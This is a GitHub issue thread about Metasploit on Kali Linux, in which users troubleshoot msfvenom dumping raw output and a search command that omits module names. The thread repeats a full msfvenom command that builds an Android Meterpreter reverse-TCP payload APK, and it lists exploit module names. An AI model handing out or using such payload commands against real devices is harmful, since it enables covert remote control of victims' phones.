Closed YASYAS123 closed 3 years ago
timwr
commented
5 years ago I don't think msfvenom within msfconsole is working with the >
You can either do:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R -o /root/Desktop/a.apk
Or, just run msfvenom before you run msfconsole
YASYAS123
commented
5 years ago I don't think msfvenom within msfconsole is working with the > You can either do:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R -o /root/Desktop/a.apkOr, just run msfvenom before you run msfconsole
What the hell? Thank you sooo much!!! But why does it just work like that? Is it the update? And what's going on with the search command? And where did you know that? Again thank you !!!
bcoles
commented
5 years ago But why does it just work like that? Is it the update?
It's likely an issue with the Metsploit package on Kali, in combination with Ruby dependencies. It may or may not be a result of an update to Kali packages.
And what's going on with the search command?
What's wrong with the search command?
YASYAS123
commented
5 years ago But why does it just work like that? Is it the update?
It's likely an issue with the Metsploit package on Kali, in combination with Ruby dependencies. It may or may not be a result of an update to Kali packages.
And what's going on with the search command?
What's wrong with the
searchcommand?
Hm, ok strange... The search command doesn't show the names of the exploits etc... But it did before the update
YASYAS123
commented
5 years ago Thank you guys, didn't expect so much help ^^ I am new here and this was the first thing I asked on Github, thank you.
bcoles
commented
5 years ago Search works fine for me...
# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v5.0.36-dev ]
+ -- --=[ 1905 exploits - 1073 auxiliary - 329 post ]
+ -- --=[ 545 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search librenms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection
master branch# ./msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
PPPPP IIIIIII N N
P PP I NN N IDENTIFICATION
P PP I N N N
PPPPP I N N N PROGRAM
P I N NN
P IIIIIII N N
Strike a key when ready ...
=[ metasploit v5.0.37-dev-182c8a23f4 ]
+ -- --=[ 1930 exploits - 1077 auxiliary - 332 post ]
+ -- --=[ 552 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > search librenms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection
msf5 > Search works fine for me...
Kali metasploit-framework package (5.0.36-0kali1)
# msfconsole [-] ***rting the Metasploit Framework console.../ [-] * WARNING: No database support: No database YAML file [-] *** _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v5.0.36-dev ] + -- --=[ 1905 exploits - 1073 auxiliary - 329 post ] + -- --=[ 545 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] msf5 > search librenms Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection
masterbranch# ./msfconsole [-] ***rting the Metasploit Framework console...| [-] * WARNING: No database support: No database YAML file [-] *** PPPPP IIIIIII N N P PP I NN N IDENTIFICATION P PP I N N N PPPPP I N N N PROGRAM P I N NN P IIIIIII N N Strike a key when ready ... =[ metasploit v5.0.37-dev-182c8a23f4 ] + -- --=[ 1930 exploits - 1077 auxiliary - 332 post ] + -- --=[ 552 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] msf5 > search librenms Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/linux/http/librenms_addhost_cmd_inject 2018-12-16 excellent No LibreNMS addhost Command Injection msf5 >
Yes I see... Then I am the only one I think xD
bcoles
commented
5 years ago Do you get any console output? Are there any errors in ~/.msf4/logs/framework.log ?
YASYAS123
commented
5 years ago Do you get any console output? Are there any errors in
~/.msf4/logs/framework.log?
Yes it shows everything except of the names of the payloads, exploit, etc... I don't know if there are any errors.
bcoles
commented
5 years ago @YASYAS123 Is this issue resolved? Is the search function working for you now?
ghost
commented
5 years ago I am also facing the same problem. Search does show exploit Names.
Example: msf5 > search wp
0 2014-08-07 normal No WordPress custom-contact-forms Plugin SQL Upload 1 2015-02-25 normal Yes WordPress WP EasyCart Plugin Privilege Escalation 2 2018-11-08 normal Yes WordPress WP GDPR Compliance Plugin Privilege Escalation 3 2019-04-02 normal Yes WordPress Google Maps Plugin SQL Injection 4 2015-08-18 normal Yes WordPress Symposium Plugin SQL Injection 5 2015-02-09 normal Yes WordPress WPLMS Theme Privilege Escalation 6 normal No NetBIOS Response Brute Force Spoof (Direct) 7 2012-11-01 normal No SAP ConfigServlet OS Command Execution 8 normal No WordPress Traversal Directory DoS 9 2014-11-20 normal No WordPress Long Password DoS 10 2014-08-06 normal No Wordpress XMLRPC DoS 11 2018-05-01 normal No LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator 12 2014-05-09 normal No AlienVault Authenticated SQL Injection Arbitrary File Read 13 normal No Snare Lite for Windows Registry Access 14 2015-03-19 normal Yes WordPress All-in-One Migration Export 15 2015-02-02 normal Yes WordPress Ultimate CSV Importer User Table Extract 16 normal Yes WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract 17 normal Yes Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database 18 normal Yes Joomla Page Scanner 19 normal Yes Joomla Plugins Scanner 20 normal Yes Joomla Version Scanner 21 2017-02-01 normal Yes WordPress REST API Content Injection 22 2015-03-03 normal Yes WordPress CP Multi-View Calendar Unauthenticated SQL Injection Scanner 23 2018-06-26 normal No Wordpress Arbitrary File Deletion 24 2015-02-24 normal Yes WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner 25 normal Yes WordPress DukaPress Plugin File Read Vulnerability 26 normal Yes WordPress GI-Media Library Plugin Directory Traversmsf5 > search wp
h00die
commented
5 years ago What OS and msf version?
github-actions[bot]
commented
4 years ago Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
github-actions[bot]
commented
3 years ago Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
HassanOsamap
commented
1 year ago zsh: too many symbolic links encountered: msfvenom This message show when I run this " msfvenom -p android/meterpreter/reverse_tcp LHOST=&&&&& LPORT=4444 R > /sdcard/termux.apk
So, my metasploit has this problem (after Kali Linux update) that any payload made with msfvenom seems to work, but gives a huge non readable code or error. So after typing msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > /root/Desktop/app.apk for example it says:
[*] exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 R > /root/Desktop/a.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 10093 bytes �N�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O�@��@��"��]T�`B��+8��Z�������
as you can see it begins to create a huge text. The search function doesn't show the names of the payloads, exploits, ect...
Metasploit 5.0.36-dev Kali linux
I am new to github by the way